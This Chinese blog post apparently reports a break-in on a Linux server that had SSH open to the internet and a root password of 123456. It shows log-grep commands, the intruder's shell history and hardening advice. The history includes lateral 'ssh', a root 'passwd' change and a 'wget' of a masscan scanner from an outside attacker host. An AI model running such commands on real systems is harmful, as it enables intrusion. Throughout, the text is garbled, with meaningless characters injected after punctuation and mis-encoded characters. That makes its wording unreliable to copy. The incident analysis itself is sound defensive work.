root密碼被修改
新裝機的Linux服務(wù)器替換老服務(wù)器茉兰,并且接通了外網(wǎng)尤泽,之前一直以為外網(wǎng)SSH的22端口是不通的,都是在內(nèi)網(wǎng)跳板機SSH登陸规脸,所以沒太注意密碼復(fù)雜度坯约,裝機時root密碼設(shè)為123456了。而實際上外網(wǎng)的22端口是開放的莫鸭。第二天發(fā)現(xiàn)SSH登陸不了闹丐,提示密碼錯誤。運維人員進入機房
采用單用戶模式進入服務(wù)器修改密碼黔龟,才又可以登陸妇智。
image
拿回密碼之后排查被入侵過程如下。
誰成功登陸過氏身?
[root@localhost home]# grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}' #secure文件每周歸檔加上-歸檔時間巍棱,如果查上周登陸將secure改為secure-上周最后一天日期
Jun 08 21:21:26 root 10.1.1.5 #登錄成功的日期、時間蛋欣、用戶名航徙、IP
Jun 08 22:52:48 root 10.1.1.5 【跳板機使用123456登陸】
Jun 08 23:24:27 root 10.1.1.5
Jun 09 00:08:29 root 194.165.16.45 【俄羅斯IP,外網(wǎng)使用123456登陸】
Jun 09 01:19:39 root 223.112.28.14 【南京IP陷虎,外網(wǎng)使用123456登陸】
Jun 09 01:20:16 root 92.80.248.158 【羅馬尼亞IP到踏,外網(wǎng)使用123456登陸】
Jun 09 16:06:38 root 10.1.1.5
Jun 09 16:10:00 root 10.1.1.5 【單用戶修改密碼后跳板機可以登陸】
執(zhí)行g(shù)rep "Failed password for root" /var/log/secure | awk '{print $11}' 查看看自己的服務(wù)器有沒有人嘗試破解
入侵者登陸后做了什么?
[root@localhost home]#history | more 【去除自己執(zhí)行的指令尚猿,剩下的就是入侵者的指令】
548 w 【查看登陸用戶】
549 ls
550 free -mt 【查看內(nèi)存】
551 lscpu
552 cat /proc/cpu info
553 cat /pro/cpcuinfo #查看cpu信息
554 cat /proc/cpuinfo
555 ifconfig
556 ssh 10.1.1.26 【嘗試內(nèi)網(wǎng)其它服務(wù)器窝稿,如果其它服務(wù)器密碼簡單也會被攻陷】
557 w
558 passwd 【修改root密碼】
559 wget nasapaul.com/masscan 【下載端口掃描工具,沒成功】
560 wget
561 ls
562 df -h
563 nvidia-smi
564 w
565 ls
566 cat /etc/hosts
567 top
入侵者沒有過多操作凿掂,改了root密碼就離開了伴榔。不太清楚他會以后再來,還是到此為止庄萎。搜索nasapaul踪少,可以看到一些其它服務(wù)器被攻擊的信息,網(wǎng)上有個羅馬尼亞黑客網(wǎng)名叫paul糠涛,高調(diào)囂張援奢,專門入侵服務(wù)器,并且不斷在內(nèi)網(wǎng)破解其它服務(wù)器的密碼忍捡,利用服務(wù)器算力挖門羅幣集漾。結(jié)合登陸IP有羅馬尼亞地址切黔,很可能就是這個人。
他在這臺服務(wù)器上只修改了密碼就離開了帆竹,沒有部署挖礦程序绕娘。
結(jié)論
替換之前的老服務(wù)器外網(wǎng)端口也是開的脓规,但是多年未被登陸栽连,就是因為密碼比較復(fù)雜。
此事的教訓(xùn)就是
- root密碼一定要有復(fù)雜度侨舆,一方面你認為不通外網(wǎng)的服務(wù)器未必不通外網(wǎng)秒紧。另一方面,和你同一局域網(wǎng)的機器被控制了挨下,入侵者以它為跳板熔恢,你也直接面臨來自外網(wǎng)的破解。
- 123456可能是最弱的密碼臭笆,六個1可能都更好叙淌。
- 互聯(lián)網(wǎng)SSH端口一定關(guān)閉。
- 修改/etc/ssh/sshd_config里的Port值為22之外的值愁铺,能增加破解難度鹰霍。
